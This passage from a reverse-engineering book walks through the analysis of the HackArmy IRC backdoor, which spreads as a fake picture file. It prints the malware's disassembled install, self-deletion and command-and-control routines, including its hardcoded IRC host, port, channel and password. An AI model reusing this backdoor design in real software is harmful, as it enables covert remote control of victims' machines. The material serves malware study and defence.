The program is essentially a Trojan because it is frequently distributed as an innocent picture file. The file is called a variety of names. My particular copy was named Webcam Shots.scr. The SCR extension is reserved for screen savers, but screensavers are really just regular programs; you could theoretically create a word processor with an .scr extension—it would work just fine. The reason this little trick is effective is that some programs (such as e-mail clients) stupidly give these files a little bitmap icon instead of an application icon, so the user might actually think that they're pictures, when in fact they are programs. One trivial solution is to simply display a special alert that notifies the user when an executable is being downloaded via Web or e-mail. The specific file name that is used for distributing this file really varies. In some e-mail messages (typically sent to news groups) the program is disguised as a picture of soccer star David Beckham, while other messages claim that the file contains proof that Nick Berg, an American civilian who was murdered in Iraq in May of 2004, is still alive. In all messages, the purpose of both the message and the file name is to persuade the unsuspecting user to open the attachment and activate the backdoor.
As with every executable, you begin by dumping its basic headers and import/export entries. You do this by running it through DUMPBIN or a similar program. The output from DUMPBIN is shown in Listing 8.1.
Example 8.1. An abridged DUMPBIN output for the HackArmy backdoor.
Microsoft (R) COFF/PE Dumper Version 7.10.3077
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file Webcam Shots.scr
File Type: EXECUTABLE IMAGE
Section contains the following imports:
KERNEL32.DLL
0 LoadLibraryA
0 GetProcAddress
0 ExitProcess
ADVAPI32.DLL
0 RegCloseKey
CRTDLL.DLL
0 atoi
SHELL32.DLL
0 ShellExecuteA
USER32.DLL
0 CharUpperBuffA
WININET.DLL
0 InternetOpenA
WS2_32.DLL
0 bind
Summary
3000 .rsrc
9000 UPX0
2000 UPX1
This output exhibits several unusual properties regarding the executable. First of all, there are quite a few DLLs that only have a single import entry, which is highly irregular and really makes no sense. What would the program be able to do with the Winsock 2 binary WS2_32.DLL if it only called the bind API? Not much. The same goes for CRTDLL.DLL, ADVAPI32.DLL, and the rest of the DLLs listed in the import table. The revealing detail here is the Summary section near the end of the listing. One would expect a section called .text that would contain the program code, but there is no such section. Instead there is the traditional .rsrc resource section, and two unrecognized sections called UPX0 and UPX1.
A quick online search reveals that UPX is an open-source executable packer. An executable packer is a program that compresses or encrypts an executable program in place, meaning that the transformation is transparent to the end user—the program is automatically restored to its original state in memory as soon as it is launched. Some packers are designed as antireversing tools that encrypt the program and try to fend off debuggers and disassemblers. Others simply compress the program for the purpose of decreasing the binary file size. UPX belongs to the second group, and is not designed as an antireversing tool, but simply as a compression tool. It makes sense for this type of Trojan/Backdoor to employ UPX in order to keep its file size as small as possible.
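The two warning signs discussed above (no conventional code section, and an import table with mostly one function per DLL) can be turned into a rough heuristic. The following is only a sketch under my own assumptions: the function name `looks_packed`, the one-half threshold, and the set of "usual" code section names are illustrative choices, not a rule any particular tool implements. The sample data is copied from the DUMPBIN listing.

```python
# Section names that linkers commonly use for code; their absence is suspicious.
USUAL_CODE_SECTIONS = {".text", "CODE"}


def looks_packed(section_names, imports_by_dll):
    """Heuristic only: no code section plus a skeletal import table."""
    has_code_section = any(name in USUAL_CODE_SECTIONS for name in section_names)
    single_import_dlls = sum(
        1 for functions in imports_by_dll.values() if len(functions) == 1
    )
    # Assumed threshold: at least half of the DLLs import a single function.
    mostly_single = single_import_dlls >= len(imports_by_dll) / 2
    return (not has_code_section) and mostly_single


packed_sections = [".rsrc", "UPX0", "UPX1"]
packed_imports = {
    "KERNEL32.DLL": ["LoadLibraryA", "GetProcAddress", "ExitProcess"],
    "ADVAPI32.DLL": ["RegCloseKey"],
    "CRTDLL.DLL": ["atoi"],
    "SHELL32.DLL": ["ShellExecuteA"],
    "USER32.DLL": ["CharUpperBuffA"],
    "WININET.DLL": ["InternetOpenA"],
    "WS2_32.DLL": ["bind"],
}

print(looks_packed(packed_sections, packed_imports))
```

The presence of LoadLibraryA and GetProcAddress in the skeletal table fits the picture as well: those two functions are all an unpacking stub needs in order to resolve the real imports at runtime.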
You can verify this assumption by downloading the latest beta version of UPX for Windows (note that the Backdoor uses the latest UPX beta, and that the most recent public release at the time of writing, version 1.25, could not identify the file). You can run UPX on the Backdoor executable with the -l switch so that UPX displays compression information for the Backdoor file.
Ultimate Packer for eXecutables
Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004
UPX 1.92 beta Markus F.X.J. Oberhumer & Laszlo Molnar Jul 20th 2004
File size Ratio Format Name
-------------------- ------ ----------- -----------
27680 -> 18976 68.55% win32/pe Webcam Shots.scr
As expected, the Backdoor is packed with UPX, and is actually about 8.5 KB lighter because of it. Even though UPX is not designed as an antireversing tool, it is going to be slightly annoying to reverse this program in its compressed form, so you can simply avoid the problem by asking UPX to permanently decompress it; you'll reverse the decompressed file. This is done by running UPX again, this time with the -d switch, which replaces the compressed file with a decompressed version that is functionally identical to the compressed version. At this point, it would be wise to rerun DUMPBIN and see if you get a better result this time. Listing 8.2 contains the DUMPBIN output for the decompressed version.
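The numbers in the UPX report are easy to check by hand. This short calculation uses only the two file sizes printed by UPX; the variable names are mine.

```python
unpacked_size = 27680  # bytes, from the UPX listing
packed_size = 18976    # bytes, from the UPX listing

# UPX reports the packed size as a percentage of the unpacked size.
ratio_percent = round(packed_size / unpacked_size * 100, 2)
saved_bytes = unpacked_size - packed_size
saved_kib = saved_bytes / 1024

print(ratio_percent, saved_bytes, saved_kib)
```

The ratio matches the 68.55% that UPX prints, and the saving works out to 8,704 bytes.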
Example 8.2. DUMPBIN output for the decompressed version of the Backdoor program.
Dump of file Webcam Shots.scr
Section contains the following imports:
KERNEL32.DLL
0 DeleteFileA
0 ExitProcess
0 ExpandEnvironmentStringsA
0 FreeLibrary
0 GetCommandLineA
0 GetLastError
0 GetModuleFileNameA
0 GetModuleHandleA
0 GetProcAddress
0 GetSystemDirectoryA
0 CloseHandle
0 GetTempPathA
0 GetTickCount
0 GetVersionExA
0 LoadLibraryA
0 CopyFileA
0 OpenProcess
0 ReleaseMutex
0 RtlUnwind
0 CreateFileA
0 Sleep
0 TerminateProcess
0 TerminateThread
0 WriteFile
0 CreateMutexA
0 CreateThread
ADVAPI32.DLL
0 GetUserNameA
0 RegDeleteValueA
0 RegCreateKeyExA
0 RegCloseKey
0 RegQueryValueExA
0 RegSetValueExA
CRTDLL.DLL
0 __GetMainArgs
0 atoi
0 exit
0 free
0 malloc
0 memset
0 printf
0 raise
0 rand
0 signal
0 sprintf
0 srand
0 strcat
0 strchr
0 strcmp
0 strncpy
0 strstr
0 strtok
SHELL32.DLL
0 ShellExecuteA
USER32.DLL
0 CharUpperBuffA
WININET.DLL
0 InternetCloseHandle
0 InternetGetConnectedState
0 InternetOpenA
0 InternetOpenUrlA
0 InternetReadFile
WS2_32.DLL
0 WSACleanup
0 listen
0 ioctlsocket
0 inet_addr
0 htons
0 getsockname
0 socket
0 gethostbyname
0 gethostbyaddr
0 connect
0 closesocket
0 bind
0 accept
0 __WSAFDIsSet
0 WSAStartup
0 send
0 select
0 recv
Summary
1000 .bss
1000 .data
1000 .idata
3000 .rsrc
3000 .text
That's more like it. Now you can see exactly which functions are used by the program, and reversing it is going to be a more straightforward task. Keep in mind that in some cases automatically unpacking the program is not going to be possible, and you would have to confront the packed program. This subject is discussed in depth in Part III of this book. For now let's start by running the program and trying to determine what it does. Needless to say, this should only be done in a controlled environment, on an isolated system that doesn't contain any valuable data or programs. There's no telling what this program is liable to do.
When you launch the Webcam Shots.scr file, the first thing you'll notice is that nothing happens. That's the way it should be: this program does not want to present itself to the end user in any way. It was made to be invisible. If the program's authors wanted the program to be even more convincing and effective, they could have embedded an actual image file into this executable, and had the program extract and display it as soon as it is first launched. This way the user would never suspect that anything was wrong because the image would be properly displayed. By not doing anything when the user clicks on this file the program might be exposing itself, but then again the typical victims of these kinds of programs are usually nontechnical users who aren't sure exactly what to expect from the computer at any given moment in time. They'd probably think that the reason the image didn't appear was their own fault.
The first actual change that takes place after the program is launched is that the original executable is gone from the directory where it was launched! The task list in Task Manager (or any other process list viewer) seems to contain a new and unidentified process called ZoneLockup.exe. (The machine I was running this on was a freshly installed, clean Windows 2000 system with almost no additional programs installed, so it was easy to detect the newly created process.) The file's name is clearly designed to fool naïve users into thinking that this process is some kind of a security component.
If you launch a more powerful process viewer such as the Sysinternals Process Explorer (available from www.sysinternals.com), you can examine the full path of the ZoneLockup.exe process. It looks like the program has placed itself in the SYSTEM32 directory of the currently running OS (in my case this was C:\WINNT\SYSTEM32).
Let's take a quick look at the code that executes when we initially run this program, because it is the closest thing this program has to an installation program. This code is presented in Listing 8.3.
Example 8.3. The backdoor program's installation function.
00402621 PUSH EBP
00402622 MOV EBP,ESP
00402624 SUB ESP,42C
0040262A PUSH EBX
0040262B PUSH ESI
0040262C PUSH EDI
0040262D XOR ESI,ESI
0040262F PUSH 104 ; BufSize = 104 (260.)
00402634 PUSH ZoneLock.00404540 ; PathBuffer = ZoneLock.00404540
00402639 PUSH 0 ; hModule = NULL
0040263B CALL <JMP.&KERNEL32.GetModuleFileNameA>
00402640 PUSH 104 ; BufSize = 104 (260.)
00402645 PUSH ZoneLock.00404010 ; Buffer = ZoneLock.00404010
0040264A CALL <JMP.&KERNEL32.GetSystemDirectoryA>
0040264F PUSH ZoneLock.00405544 ; src = "\"
00402654 PUSH ZoneLock.00404010 ; dest = "C:\WINNT\system32"
00402659 CALL <JMP.&CRTDLL.strcat>
0040265E ADD ESP,8
00402661 LEA ECX,DWORD PTR DS:[404540]
00402667 OR EAX,FFFFFFFF
0040266A INC EAX
0040266B CMP BYTE PTR DS:[ECX+EAX],0
0040266F JNZ SHORT ZoneLock.0040266A
00402671 MOV EBX,EAX
00402673 PUSH EBX ; Count
00402674 PUSH ZoneLock.00404540 ; String = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
00402679 CALL <JMP.&USER32.CharUpperBuffA>
0040267E LEA ECX,DWORD PTR DS:[404010]
00402684 OR EAX,FFFFFFFF
00402687 INC EAX
00402688 CMP BYTE PTR DS:[ECX+EAX],0
0040268C JNZ SHORT ZoneLock.00402687
0040268E MOV EBX,EAX
00402690 PUSH EBX ; Count
00402691 PUSH ZoneLock.00404010 ; String = "C:\WINNT\system32"
00402696 CALL <JMP.&USER32.CharUpperBuffA>
0040269B PUSH 0
0040269D CALL ZoneLock.004019CB
004026A2 ADD ESP,4
004026A5 PUSH ZoneLock.00404010 ; s2 = "C:\WINNT\system32"
004026AA PUSH ZoneLock.00404540 ; s1 = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
004026AF CALL <JMP.&CRTDLL.strstr>
004026B4 ADD ESP,8
004026B7 CMP EAX,0
004026BA JNZ SHORT ZoneLock.00402736
004026BC PUSH ZoneLock.00405094 ; src = "ZoneLockup.exe"
004026C1 PUSH ZoneLock.00404010 ; dest = "C:\WINNT\system32"
004026C6 CALL <JMP.&CRTDLL.strcat>
004026CB ADD ESP,8
004026CE MOV EDI,0
004026D3 JMP SHORT ZoneLock.004026E0
004026D5 PUSH 1F4 ; Timeout = 500. ms
004026DA CALL <JMP.&KERNEL32.Sleep>
004026DF INC EDI
004026E0 PUSH 0 ; FailIfExists = FALSE
004026E2 PUSH ZoneLock.00404010 ; NewFileName = "C:\WINNT\system32"
004026E7 PUSH ZoneLock.00404540 ; ExistingFileName = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
004026EC CALL <JMP.&KERNEL32.CopyFileA>
004026F1 OR EAX,EAX
004026F3 JNZ SHORT ZoneLock.004026FA
004026F5 CMP EDI,5
004026F8 JL SHORT ZoneLock.004026D5
004026FA PUSH ZoneLock.00404540 ; <%s> = "C:\WINNT\SYSTEM32\ZoneLockup.exe"
004026FF PUSH ZoneLock.0040553D ; format = "qwer%s"
00402704 LEA EAX,DWORD PTR SS:[EBP-29C]
0040270A PUSH EAX ; s
0040270B CALL <JMP.&CRTDLL.sprintf>
00402710 ADD ESP,0C
00402713 PUSH 5 ; IsShown = 5
00402715 PUSH 0 ; DefDir = NULL
00402717 LEA EAX,DWORD PTR SS:[EBP-29C]
0040271D PUSH EAX ; Parameters
0040271E PUSH ZoneLock.00404010 ; FileName = "C:\WINNT\system32"
00402723 PUSH ZoneLock.00405696 ; Operation = "open"
00402728 PUSH 0 ; hWnd = NULL
0040272A CALL <JMP.&SHELL32.ShellExecuteA>
0040272F PUSH 0 ; ExitCode = 0
00402731 CALL <JMP.&KERNEL32.ExitProcess>
00402736 CALL <JMP.&KERNEL32.GetCommandLineA>
0040273B PUSH ZoneLock.00405538 ; s2 = "qwer"
00402740 PUSH EAX ; s1
00402741 CALL <JMP.&CRTDLL.strstr>
00402746 ADD ESP,8
00402749 MOV ESI,EAX
0040274B OR ESI,ESI
0040274D JE SHORT ZoneLock.00402775
0040274F MOV ECX,ESI
00402751 OR EAX,FFFFFFFF
00402754 INC EAX
00402755 CMP BYTE PTR DS:[ECX+EAX],0
00402759 JNZ SHORT ZoneLock.00402754
0040275B CMP EAX,8
0040275E JBE SHORT ZoneLock.00402775
00402760 PUSH 7D0 ; Timeout = 2000. ms
00402765 CALL <JMP.&KERNEL32.Sleep>
0040276A MOV EAX,ESI
0040276C ADD EAX,4
0040276F PUSH EAX ; FileName
00402770 CALL <JMP.&KERNEL32.DeleteFileA>
00402775 PUSH ZoneLock.004050A3 ; MutexName = "botsmfdutpex"
0040277A PUSH 1 ; InitialOwner = TRUE
0040277C PUSH 0 ; pSecurity = NULL
0040277E CALL <JMP.&KERNEL32.CreateMutexA>
00402783 MOV DWORD PTR DS:[404650],EAX
00402788 CALL <JMP.&KERNEL32.GetLastError>
0040278D CMP EAX,0B7
00402792 JNZ SHORT ZoneLock.0040279B
00402794 PUSH 0 ; ExitCode = 0
00402796 CALL <JMP.&KERNEL32.ExitProcess>
When the program is first launched, it runs some checks to see whether it has already been installed, and if not it installs itself. This is done by calling GetModuleFileName to obtain the primary executable's file name, and checking whether the system's SYSTEM32 directory name is part of the path. If the program has not yet been installed, it proceeds to copy itself to the SYSTEM32 directory under the name ZoneLockup.exe, launches that executable, and terminates itself by calling ExitProcess.
The new instance of the process is obviously going to run this exact same code, except this time the SYSTEM32 check will find that the program is already running from SYSTEM32 and will wind up running the code at 00402736. This sequence checks whether this is the first time that the program is launched from its permanent habitat. This is done by checking for a special flag, qwer, in the command-line parameters, which is followed by the full path and name of the original Trojan executable that was launched (something like Webcam Shots.scr). The program needs this information so that it can delete this file; there is no reason to keep the original executable in place after ZoneLockup.exe is created and launched.
If you're wondering why this file name was passed into the new instance instead of just deleting it in the previous instance, there is a simple answer: It wouldn't have been possible to delete the executable while the program was still running, because Windows locks executable files while they are loaded into memory. The program had to launch a new instance, terminate the first one, and delete the original file from this new instance.
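The decisions made by the startup code can be condensed into a few lines. The following is a pure model of my reading of Listing 8.3, not the Trojan's source: it only returns a description of what the real code would do and performs no file or process operations. The function name `plan_startup` and the tuple it returns are my own inventions for illustration.

```python
def plan_startup(module_path, system_dir, command_line, flag="qwer"):
    """Model the startup decisions; returns (action, path, parameters)."""
    # Both strings are uppercased before the substring test (CharUpperBuffA),
    # and a backslash is appended to the system directory first (strcat).
    module_upper = module_path.upper()
    system_upper = (system_dir + "\\").upper()

    if system_upper not in module_upper:
        # Not installed yet: the copy target is <system dir>\ZoneLockup.exe, and
        # the new instance receives the flag followed directly by the old path.
        target = system_upper + "ZoneLockup.exe"
        return ("install", target, flag + module_upper)

    # Already running from the system directory: look for the flag (strstr).
    position = command_line.find(flag)
    if position != -1:
        tail = command_line[position:]
        # The listing deletes only when the flagged string exceeds 8 characters.
        if len(tail) > 8:
            return ("delete_original", tail[len(flag):], None)
    return ("run", None, None)


print(plan_startup(r"C:\Temp\Webcam Shots.scr", r"C:\WINNT\system32", ""))
```

Note how the path handed to the delete step is simply whatever follows the four flag characters, which corresponds to the ADD EAX,4 that precedes the DeleteFileA call.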
The function proceeds to create a mutex called botsmfdutpex, whatever that means. The purpose of this mutex is to make sure no other instances of the program are already running; the program terminates if the mutex already exists. This mechanism ensures that the program doesn't try to infect the same host twice.
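The single-instance check is a common Windows idiom: create a named mutex, then ask whether it already existed. The value 0B7 that the listing compares against is ERROR_ALREADY_EXISTS (183 in decimal). The sketch below imitates that behavior with an ordinary Python set standing in for the system's table of named objects, so `create_mutex` and `should_exit` are illustrative stand-ins rather than real API calls.

```python
ERROR_ALREADY_EXISTS = 0xB7  # 183, the value compared after GetLastError

# Stand-in for the system-wide table of named objects (illustration only).
_named_objects = set()


def create_mutex(name):
    """Return (handle, last_error), imitating CreateMutexA for a named mutex."""
    if name in _named_objects:
        # A handle is still returned; only the last-error value differs.
        return (object(), ERROR_ALREADY_EXISTS)
    _named_objects.add(name)
    return (object(), 0)


def should_exit(name="botsmfdutpex"):
    """True when another instance has already created the mutex."""
    _handle, last_error = create_mutex(name)
    return last_error == ERROR_ALREADY_EXISTS


first = should_exit()
second = should_exit()
print(first, second)
```

The first caller proceeds and every later caller exits, which is exactly the behavior described above.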
The next part of this function is a bit too long to print here, but it's easily readable: It collects several bits of information regarding the host, including the exact version of the operating system, and the currently logged-on user. This is followed by what is essentially the program's main loop, which is printed in Listing 8.4.
Example 8.4. The Backdoor program's primary network connection check loop.
00402939 /PUSH 0
0040293B |LEA EAX,DWORD PTR SS:[EBP-4]
0040293E |PUSH EAX
0040293F |CALL <JMP.&WININET.InternetGetConnectedState>
00402944 |OR EAX,EAX
00402946 |JNZ SHORT ZoneLock.00402954
00402948 |PUSH 7530 ; Timeout = 30000. ms
0040294D |CALL <JMP.&KERNEL32.Sleep>
00402952 |JMP SHORT ZoneLock.0040299A
00402954 |CMP DWORD PTR DS:[EDI*4+405104],0
0040295C |JNZ SHORT ZoneLock.00402960
0040295E |XOR EDI,EDI
00402960 |PUSH DWORD PTR DS:[EDI*4+40510C]
00402967 |PUSH DWORD PTR DS:[EDI*4+405104]
0040296E |CALL ZoneLock.004029B1
00402973 |ADD ESP,8
00402976 |MOV ESI,EAX
00402978 |CMP ESI,1
0040297B |JNZ SHORT ZoneLock.0040298A
0040297D |PUSH DWORD PTR DS:[40464C] ; Timeout = 0. ms
00402983 |CALL <JMP.&KERNEL32.Sleep>
00402988 |JMP SHORT ZoneLock.00402990
0040298A |CMP ESI,3
0040298D |JE SHORT ZoneLock.0040299C
0040298F |INC EDI
00402990 |PUSH 1388 ; /Timeout = 5000. ms
00402995 |CALL <JMP.&KERNEL32.Sleep>
0040299A \JMP SHORT ZoneLock.00402939
The first thing you'll notice about this code sequence is that it is a loop, probably coded as an infinite loop (such as a while(1) statement). In its first phase, the loop repeatedly calls the InternetGetConnectedState API and sleeps for 30 seconds if the API returns FALSE. As you've probably guessed, the InternetGetConnectedState API checks whether the computer is currently connected to the Internet. In reality, this API only checks whether the system has a valid IP address; it doesn't really check that it is connected to the Internet. It looks as if the program is checking for a network connection and is simply waiting for the system to become connected if it's not already connected.
Once the connection check succeeds, the function calls another function, 004029B1, with the first parameter being a pointer to the hard-coded string g.hackarmy.tk, and with the second parameter being 0x1A0B (6667 in decimal). This function immediately calls into a function at 0040129C, which calls the gethostbyname WinSock2 function on that g.hackarmy.tk string, and proceeds to call the connect function to connect to that address. The port number is set to the value from the second parameter passed earlier: 6667. In case you're not sure what this port number is used for, a quick trip to the IANA Web site (the Internet Assigned Numbers Authority) at www.iana.org shows that ports 6665 through 6669 are registered for IRCU, the Internet Relay Chat services.
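The control flow of the loop in Listing 8.4 is easier to follow in a high-level form. The sketch below is my reconstruction under several assumptions: the server table is modeled as a Python list of (host, port) pairs instead of the zero-terminated arrays at 00405104 and 0040510C, the meaning of return codes 1 and 3 is inferred purely from the branches that test them, and a `max_iterations` bound is added so that the model terminates. The connection check, the connect routine, and the sleep function are all injected, so nothing here touches the network.

```python
def run_loop(is_connected, connect, servers, sleep, retry_delay_ms=0,
             max_iterations=100):
    """Model of the main loop; returns 'stop' or 'bounded'."""
    index = 0
    for _ in range(max_iterations):  # the original loop has no such bound
        if not is_connected():
            sleep(30000)             # 0x7530 ms, then check again
            continue
        if index >= len(servers):
            index = 0                # wrap around at the end of the table
        host, port = servers[index]
        result = connect(host, port)
        if result == 3:
            return "stop"            # the only exit from the loop
        if result == 1:
            sleep(retry_delay_ms)    # value read from a global in the listing
        else:
            index += 1               # move on to the next table entry
        sleep(5000)                  # 0x1388 ms before the next attempt
    return "bounded"


sleeps = []
states = iter([False, True, True])
results = iter([2, 3])
outcome = run_loop(lambda: next(states), lambda host, port: next(results),
                   [("g.hackarmy.tk", 0x1A0B)], sleeps.append)
print(outcome, sleeps)
```

In this run the model waits 30 seconds for a connection, makes one attempt that fails with an arbitrary code, waits five seconds, and stops on the second attempt. The port constant is also easy to confirm: 0x1A0B is 6667.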
It looks like the Trojan is looking to chat with someone. Care to guess with whom? Here's a hint: he's wearing a black hat. Well, at least in security book illustrations he does; it's actually more likely that he's just a bored teenager wearing a baseball cap. Regardless, the program is clearly trying to connect to an IRC server in order to communicate with an attacker who is most likely its original author. The specific address being referenced is g.hackarmy.tk, which was invalid at the time of writing (and is most likely going to remain invalid). This address was probably unregistered very early on, as soon as the antivirus companies discovered that it was being used for backdoor access to infected machines. You can safely assume that this address originally pointed to some IRC server, either one set up specifically for this purpose or one of the many legitimate public servers.
To really test the Trojan's backdoor capabilities, I set up an IRC server on a separate virtual machine and named it g.hackarmy.tk, so that the Trojan connects to it when it is launched. You're welcome to try this out if you want, but you're probably going to learn plenty by just reading through my accounts of this experience. To make this reversing session truly effective, I was combining a conventional reversing session with some live chats with the backdoor through IRC.
Stepping through the code that follows the connection of the socket, you can see a function that seems somewhat interesting and unusual, shown in Listing 8.5.
Example 8.5. A random string-generation function.
004014EC PUSH EBP
004014ED MOV EBP,ESP
004014EF PUSH EBX
004014F0 PUSH ESI
004014F1 PUSH EDI
004014F2 CALL <JMP.&KERNEL32.GetTickCount>
004014F7 PUSH EAX ; seed
004014F8 CALL <JMP.&CRTDLL.srand>
004014FD POP ECX
004014FE CALL <JMP.&CRTDLL.rand>
00401503 MOV EDX,EAX
00401505 AND EDX,80000003
0040150B JGE SHORT ZoneLock.00401512
0040150D DEC EDX
0040150E OR EDX,FFFFFFFC
00401511 INC EDX
00401512 MOV EBX,EDX
00401514 ADD EBX,4
00401517 MOV ESI,0
0040151C JMP SHORT ZoneLock.00401535
0040151E CALL <JMP.&CRTDLL.rand>
00401523 MOV EDI,DWORD PTR SS:[EBP+8]
00401526 MOV ECX,1A
0040152B CDQ
0040152C IDIV ECX
0040152E ADD EDX,61
00401531 MOV BYTE PTR DS:[EDI+ESI],DL
00401534 INC ESI
00401535 CMP ESI,EBX
00401537 JLE SHORT ZoneLock.0040151E
00401539 MOV EAX,DWORD PTR SS:[EBP+8]
0040153C MOV BYTE PTR DS:[EAX+ESI],0
00401540 POP EDI
00401541 POP ESI
00401542 POP EBX
00401543 POP EBP
00401544 RETN
This generates some kind of random data (with the random seed taken from the current tick counter). The buffer length is somewhat random; the default length is 5 bytes, but it can go to anywhere from 2 to 8 bytes, depending on whether rand produces a negative or positive integer. Once the primary loop is entered, the function computes a random number for each byte, calculates a modulo 0x1A (26 in decimal) for each random number, adds 0x61 (97 in decimal), and stores the result in the current byte in the buffer.
Observing the resulting buffer in OllyDbg exposes that the program is essentially producing a short random string that is made up of lowercase letters, and that the string is placed inside the caller-supplied buffer.
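The function in Listing 8.5 can be restated in a few lines of Python. This is my reading of the disassembly, with the random source injected as a callable so the behavior can be examined deterministically; the names `signed_mod4` and `make_nick` are mine. One assumption deserves emphasis: the per-character step assumes rand returns nonnegative values (as the C runtime's rand does), because Python's % operator does not behave like IDIV for negative operands.

```python
import random


def signed_mod4(value):
    """Signed remainder modulo 4, truncating toward zero like the AND/DEC/OR/INC idiom."""
    return value % 4 if value >= 0 else -((-value) % 4)


def make_nick(rand):
    """`rand` is any callable returning an integer, standing in for CRT rand()."""
    last_index = signed_mod4(rand()) + 4          # EBX in the listing
    letters = []
    for _ in range(last_index + 1):               # the loop runs while ESI <= EBX
        letters.append(chr(rand() % 26 + 0x61))   # 0x61 is 'a'; assumes rand() >= 0
    return "".join(letters)


rng = random.Random(0)
nick = make_nick(lambda: rng.randrange(0, 0x8000))  # assumed 15-bit rand() range
print(nick)
```

With a nonnegative random source the result is always between 5 and 8 lowercase letters; the shorter lengths mentioned above would require a negative value from the first rand call.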
Notice how the modulo in Listing 8.5 is computed using the highly inefficient IDIV instruction. This indicates that the Trojan was compiled with some kind of Minimize Size compiler option (assuming that it was written in a high-level language). If the compiler was aiming at generating high-performance code, it would have used reciprocal multiplication to compute the modulo, which would have produced far longer, yet faster code. This is not surprising considering that the program originally came packed with UPX: the author of this program was clearly aiming at making the executable as tiny as possible. For more information on how to identify optimized division sequences and other common arithmetic operations, refer to Appendix B.
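For readers who haven't seen reciprocal multiplication before, here is the idea applied to the divisor 26. Instead of dividing, the code multiplies by a precomputed constant close to 2^35/26 and shifts the product right by 35 bits; the remainder then follows from the quotient. The constant and shift below are one valid choice that I verified for nonnegative 32-bit inputs; this is an illustration of the technique and not code taken from the Trojan or from any specific compiler's output.

```python
MAGIC = 0x4EC4EC4F  # ceil(2**35 / 26)
SHIFT = 35


def div26_by_multiplication(x):
    """Quotient x // 26 for 0 <= x < 2**31, using a multiply and a shift."""
    return (x * MAGIC) >> SHIFT


def mod26_by_multiplication(x):
    """Remainder derived from the quotient: x - 26 * (x // 26)."""
    return x - 26 * div26_by_multiplication(x)


print(mod26_by_multiplication(12345), 12345 % 26)
```

In machine code this becomes a multiply, a shift, another multiply, and a subtract, which is longer than a single IDIV but typically much faster.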
The next sequence takes the random string and produces a string that is later sent to the IRC server. Let's take a look at that code.
00402ABB PUSH EAX ; <%s>
00402ABC PUSH ZoneLock.0040519E ; <%s> = "USER"
00402AC1 LEA EAX,DWORD PTR SS:[EBP-204]
00402AC7 PUSH EAX ; <%s>
00402AC8 PUSH ZoneLock.00405199 ; <%s> = "NICK"
00402ACD PUSH ZoneLock.004054C5 ; format = "%s %s %s %s "x.com" "x" :x"
00402AD2 LEA EAX,DWORD PTR SS:[EBP-508]
00402AD8 PUSH EAX ; s
00402AD9 CALL <JMP.&CRTDLL.sprintf>
Considering that EAX contains the address of the randomly generated string, you should now know exactly what that string is for: it is the user name the backdoor will be using when connecting to the server.
The preceding sequence produced the following message, and will always produce the same message—the only difference is going to be the randomly generated name string.
NICK vsorpy USER vsorpy "x.com" "x" :x
If you look at RFC 1459, the IRC protocol specifications, you can see that this string means that a new user called vsorpy is being registered with the server. This username is going to represent this particular system in the IRC chat. The random-naming scheme was probably created in order to enable multiple clients to connect to the same server without conflicts. The architecture actually supports convenient communication with multiple infected systems at the same time.
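The sprintf call that builds this registration message is simple enough to mirror directly. The sketch below uses the format string exactly as it is printed in the disassembly; if the real string contains a line terminator between the two commands (RFC 1459 terminates each message with CR-LF), it isn't visible there, so I haven't guessed at one. The function name is mine.

```python
def registration_message(nick):
    """Mirror the sprintf call: the nickname fills both the NICK and USER slots."""
    template = '%s %s %s %s "x.com" "x" :x'
    # Arguments appear in the reverse of the order in which they were pushed.
    return template % ("NICK", nick, "USER", nick)


print(registration_message("vsorpy"))
```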
After connecting to the IRC server, the program and the IRC server enter into a brief round of standard IRC protocol communications that is just typical protocol handshaking. The next important event takes place when the IRC server notifies the client whether or not the server has a MOTD (Message of the Day) set up. Based on this information, the program enters into the code sequence that follows, which decides how to join the communications channel in which the attacker will be communicating with the Backdoor.
00402D80 JBE SHORT ZoneLock.00402DA7
00402D82 PUSH ZoneLock.004050B6 ; <%s> = "grandad"
00402D87 PUSH ZoneLock.004050B0 ; <%s> = "##g##"
00402D8C PUSH ZoneLock.004051A3 ; <%s> = "JOIN"
00402D91 PUSH ZoneLock.004054AC ; format = "%s %s %s"
00402D96 LEA EAX,DWORD PTR SS:[EBP-260]
00402D9C PUSH EAX ; s
00402D9D CALL <JMP.&CRTDLL.sprintf>
00402DA2 ADD ESP,14
00402DA5 JMP SHORT ZoneLock.00402DC5
00402DA7 PUSH ZoneLock.004050B0 ; <%s> = "##g##"
00402DAC PUSH ZoneLock.004051A3 ; <%s> = "JOIN"
00402DB1 PUSH ZoneLock.004054BE ; format = "%s %s"
00402DB6 LEA EAX,DWORD PTR SS:[EBP-260]
00402DBC PUSH EAX ; s
00402DBD CALL <JMP.&CRTDLL.sprintf>
In the preceding sequence, the first sprintf will only be called if the server sends an MOTD, and the second one will be called if it doesn't. The two commands both join the same channel: ##g##, but if the server has an MOTD the channel will be joined with the password grandad. At this point, you can start your initial communications with the program by pretending to be the attacker and joining into a channel called ##g## on the private IRC server. As soon as you join, you will know that your friend is already there because other than your own nickname you can also see an additional random-sounding name that's connected to this channel. That's the Backdoor program.
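The two sprintf branches differ only in whether a channel key is appended. As a quick sketch (the function name and the `key` parameter are mine; the strings come from the listing):

```python
def join_message(channel, key=None):
    """Build the JOIN command with or without a channel key."""
    if key is not None:
        return "%s %s %s" % ("JOIN", channel, key)   # first sprintf in the listing
    return "%s %s" % ("JOIN", channel)               # second sprintf in the listing


print(join_message("##g##", "grandad"))
print(join_message("##g##"))
```

In IRC terms, the third token of a JOIN command is the channel key, which is why the text above describes grandad as the channel password.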
It's obvious that the backdoor can be controlled by issuing commands inside of this private channel that you've established, but how can you know which commands are supported? If the information you've gathered so far could have been gathered using a simple network monitor, the list of supported commands couldn't have been. For this, you simply must look at the command-processing code and determine which commands our program supports.
In communicating with the backdoor, the most important code area is the one that processes private-message packets, because that's how the attacker controls the program: through private message. It is quite easy to locate the code in the program that checks for a case where the PRIVMSG command is sent from the server. This will be helpful because you're expecting the code that follows this check to contain the actual parsing of commands from the attacker. The code that follows contains the only direct reference in the program to the PRIVMSG string.
00402E82 PUSH DWORD PTR SS:[EBP-C] ; s2
00402E85 PUSH ZoneLock.0040518A ; s1 = "PRIVMSG"
00402E8A CALL <JMP.&CRTDLL.strcmp> ; strcmp
00402E8F ADD ESP,8
00402E92 OR EAX,EAX
00402E94 JNZ ZoneLock.00402F8F
